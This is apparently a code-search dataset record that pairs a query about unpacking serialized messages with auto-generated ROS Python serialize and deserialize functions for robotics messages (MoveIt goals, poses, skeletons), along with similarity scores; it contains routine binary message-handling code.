buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7di3I().pack(_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs))\n _x = self.object_pose.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d().pack(_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.ctrl.header.seq, _x.ctrl.header.stamp.secs, _x.ctrl.header.stamp.nsecs))\n _x = self.ctrl.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3I.pack(_x.ctrl.left_em.header.seq, _x.ctrl.left_em.header.stamp.secs, _x.ctrl.left_em.header.stamp.nsecs))\n _x = self.ctrl.left_em.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_f3I.pack(_x.ctrl.left_em.rate, _x.ctrl.right_em.header.seq, _x.ctrl.right_em.header.stamp.secs, _x.ctrl.right_em.header.stamp.nsecs))\n _x = self.ctrl.right_em.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_f3I.pack(_x.ctrl.right_em.rate, _x.ctrl.left_em_servo.header.seq, _x.ctrl.left_em_servo.header.stamp.secs, _x.ctrl.left_em_servo.header.stamp.nsecs))\n _x = self.ctrl.left_em_servo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2fB3I.pack(_x.ctrl.left_em_servo.anglex, _x.ctrl.left_em_servo.angley, _x.ctrl.left_em_servo.fix, _x.ctrl.right_em_servo.header.seq, _x.ctrl.right_em_servo.header.stamp.secs, _x.ctrl.right_em_servo.header.stamp.nsecs))\n _x = self.ctrl.right_em_servo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2fB.pack(_x.ctrl.right_em_servo.anglex, _x.ctrl.right_em_servo.angley, _x.ctrl.right_em_servo.fix))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_4B3I.pack(_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs))\n _x = self.p1.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs))\n _x = self.p2.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs))\n _x = self.p3.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs))\n _x = self.p4.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d.pack(_x.p4.point.x, _x.p4.point.y, _x.p4.point.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2i.pack(_x.watch_dog, _x.num))\n for val1 in self.users:\n _x = val1\n buff.write(_struct_2i.pack(_x.id, _x.trackedId))\n _v25 = val1.date_discovered\n _x = _v25\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v26 = val1.date\n _x = _v26\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v27 = val1.state\n buff.write(_struct_I.pack(_v27.value))\n _v28 = val1.skeleton\n for val3 in _v28.joint:\n buff.write(_struct_d.pack(val3.confidence))\n _v29 = val3.position\n _x = _v29\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v30 = _v28.unused\n buff.write(_struct_I.pack(_v30.value))\n for val1 in self.filtered_users:\n _x = val1\n buff.write(_struct_2i.pack(_x.id, _x.trackedId))\n _v31 = val1.date_discovered\n _x = _v31\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v32 = val1.date\n _x = _v32\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v33 = val1.state\n buff.write(_struct_I.pack(_v33.value))\n _v34 = val1.skeleton\n for val3 in _v34.joint:\n buff.write(_struct_d.pack(val3.confidence))\n _v35 = val3.position\n _x = _v35\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v36 = _v34.unused\n buff.write(_struct_I.pack(_v36.value))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs))\n _x = self.goal_id.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2i3I().pack(_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs))\n _x = self.goal.pickup_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs))\n _x = self.goal.dropoff_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs))\n _x = self.goal.gripper_goal_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7di().pack(_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, _x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, _x.goal.perception_source))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill" ]
[ "0.7994329", "0.7972612", "0.7893365", "0.785495", "0.7740611", "0.7677824", "0.7657543", "0.7626826", "0.75874037", "0.7565361", "0.75626636", "0.75620574", "0.7558187", "0.75431186", "0.7534563", "0.7527763", "0.75262064", "0.75172293", "0.75110817", "0.749996", "0.7497972", "0.74832374", "0.7479107", "0.7471709", "0.74682605", "0.74646646", "0.746435", "0.7463879", "0.74623495", "0.7449862", "0.7434278", "0.74337375", "0.7427498", "0.7426039", "0.74255985", "0.74241513", "0.73966664", "0.73915565", "0.73834527", "0.7379829", "0.7377253", "0.73752964", "0.73728055", "0.7370881", "0.73664415", "0.7365433", "0.73633677", "0.73552924", "0.7338015", "0.7320973", "0.7320606", "0.73123485", "0.73077923", "0.73068595", "0.73025703", "0.72980374", "0.7287885", "0.72803277", "0.7252093", "0.72514594", "0.72465616", "0.72408265", "0.72400105", "0.7233364", "0.72187835", "0.72177404", "0.7214914", "0.7209451", "0.71995455", "0.71938413", "0.7181025", "0.71587664", "0.71371704", "0.71153873", "0.71128285", "0.70999646", "0.70889825", "0.70350146", "0.70346206", "0.7028944", "0.7024778", "0.7012065", "0.7007262", "0.7001727", "0.69979334", "0.69866544", "0.6969084", "0.6950105", "0.6936536", "0.69337714", "0.6931643", "0.6926454", "0.6892917", "0.6884027", "0.68481374", "0.6728073", "0.67206204", "0.66772145", "0.66661936", "0.6638984" ]
0.6807753
95
unpack serialized message in str into this message instance using numpy for array types
def deserialize_numpy(self, str, numpy): try: if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() end = 0 _x = self start = end end += 12 (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.header.frame_id = str[start:end].decode('utf-8') else: self.header.frame_id = str[start:end] _x = self start = end end += 8 (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal_id.id = str[start:end].decode('utf-8') else: self.goal_id.id = str[start:end] _x = self start = end end += 12 (_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.workspace_parameters.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.workspace_parameters.header.frame_id = str[start:end] _x = self start = end end += 60 (_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs,) = _get_struct_6d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _x = self start = end end += 12 (_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v445 = val1.translation _x = _v445 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v446 = val1.rotation _x = _v446 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v447 = val1.linear _x = _v447 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v448 = val1.angular _x = _v448 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v449 = val1.force _x = _v449 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v450 = val1.torque _x = _v450 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v451 = val1.object _v452 = _v451.header start = end end += 4 (_v452.seq,) = _get_struct_I().unpack(str[start:end]) _v453 = _v452.stamp _x = _v453 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v452.frame_id = str[start:end].decode('utf-8') else: _v452.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v451.id = str[start:end].decode('utf-8') else: _v451.id = str[start:end] _v454 = _v451.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v454.key = str[start:end].decode('utf-8') else: _v454.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v454.db = str[start:end].decode('utf-8') else: _v454.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v451.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v455 = val3.position _x = _v455 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v456 = val3.orientation _x = _v456 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v451.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v457 = val3.position _x = _v457 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v458 = val3.orientation _x = _v458 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) _v451.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v459 = val3.position _x = _v459 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v460 = val3.orientation _x = _v460 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v451.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v461 = val3.position _x = _v461 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v462 = val3.orientation _x = _v462 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.subframe_poses.append(val3) start = end end += 1 (_v451.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v463 = val1.detach_posture _v464 = _v463.header start = end end += 4 (_v464.seq,) = _get_struct_I().unpack(str[start:end]) _v465 = _v464.stamp _x = _v465 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v464.frame_id = str[start:end].decode('utf-8') else: _v464.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v463.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v463.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v463.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v466 = val3.time_from_start _x = _v466 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v463.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.request.start_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.request.start_state.is_diff = bool(self.goal.request.start_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.goal_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v467 = val2.header start = end end += 4 (_v467.seq,) = _get_struct_I().unpack(str[start:end]) _v468 = _v467.stamp _x = _v468 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v467.frame_id = str[start:end].decode('utf-8') else: _v467.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v469 = val2.target_point_offset _x = _v469 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v470 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v470.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v471 = val4.position _x = _v471 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v472 = val4.orientation _x = _v472 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v470.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v470.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v473 = val4.position _x = _v473 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v474 = val4.orientation _x = _v474 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v470.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v475 = val2.header start = end end += 4 (_v475.seq,) = _get_struct_I().unpack(str[start:end]) _v476 = _v475.stamp _x = _v476 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v475.frame_id = str[start:end].decode('utf-8') else: _v475.frame_id = str[start:end] _v477 = val2.orientation _x = _v477 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 